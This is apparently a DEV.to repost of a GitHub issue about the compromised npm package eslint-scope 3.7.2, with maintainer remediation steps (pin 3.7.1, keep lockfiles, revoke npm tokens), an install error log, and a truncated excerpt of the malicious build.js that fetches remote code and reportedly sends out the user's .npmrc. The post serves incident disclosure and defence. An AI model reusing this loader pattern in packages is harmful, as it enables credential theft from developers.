Virus in eslint-scope 3.7.2

I came across this issue and figured I shared it here.

Virus in eslint-scope? #39

pronebird avatar
pronebird commented on Jul 12, 2018

Update from the maintainers

Incident status report from npm

Please follow the comment by @platinumazure that gives a little insight into what happened:

It also appears that the same code was published in eslint-config-eslint@5.0.2, which has also since been unpublished. See for more information.

In the meantime

  1. Pin the version of eslint-scope to 3.7.1, one way is to add the resolutions to your package.json
  "resolutions": {
    "eslint-scope": "3.7.1"

Verify the dependency version with yarn list eslint-scope. It should print out eslint-scope@3.7.1

  1. Use package-lock.json or yarn.lock and have it in your repo if possible. Do not upgrade to 3.7.2 even if yarn outdated shows that there is a new version available.

  2. Revoke your NPM token as suggested in the comment below You can do the same by logging in to, selecting the "tokens" menu from the account dropdown and removing all tokens listed on the page. Make sure to recreate the relevant tokens if you hook your NPM to external services.

The issue

I don't know what the hell this is but it looks like a virus to me:

[2/3] β   eslint-scope
error /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope: Command failed.
Exit code: 1
Command: node ./lib/build.js
Directory: /Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope

SyntaxError: Unexpected end of input
    at IncomingMessage.r.on (/Users/pronebird/Desktop/electron-react-redux-boilerplate/node_modules/eslint-scope/lib/build.js:6:10)
    at emitOne (events.js:116:13)
    at IncomingMessage.emit (events.js:211:7)
    at (_stream_readable.js:475:10)
    at flow (_stream_readable.js:846:34)
    at resume_ (_stream_readable.js:828:3)
    at _combinedTickCallback (internal/process/next_tick.js:138:11)

The contents of a suspicious file:

    var https=require('https');
    https.get({'hostname':'',path:'/raw/XLeVP82h',headers:{'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:52.0) Gecko/20100101 Firefox/52.0',Accept:'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'}},(r)=>{

The URL it attempts to load is

Also it attempts to send my .npmrc somewhere.

This is version 3.7.2 that's been published an hour ago.

package managers are a surprising medium to spread viruses, especially when the virus is latched onto a dependency of babel-eslint 😱

Did you find this post useful? Show some love!

Not exactly a virus but an exfiltration tool

Classic DEV Post from May 11

My Programming Journey: Have Patience And Avoid Burnout.

This week I decided to talk about a couple of things that I feel like probably a lot of you might go through on your way to getting where ever it is you want to get to. And that is that burn out feeling or lack of motivation after the fun of doing something turns into well work. And having the patience to get to your goal.

Follow @alexgwartney to see more of their posts in your feed.
Mac Siri
I'm a refactor-loving developer and I promise you I have nothing to do with Apple's Siri.
Trending on
Securing your Node js api with JSON Web Token
#javascript #node #jwt
Master the World of ReactJS - Issue #12
#react #redux #typescript #javascript
BxJS Weekly Episode 19 - javascript news podcast
#javascript #node #podcast #news
Proxymise Your Async Code
#javascript #coding
Thoughts on "Security Through Obscurity"
Published my first ever npm package
#npm #javascript
Local development with HTTPS on OSX
#webdev #security
Open source: Cookie notifier, MailChimp mod, Editable job listings & more
#showdev #opensource #webdev #javascript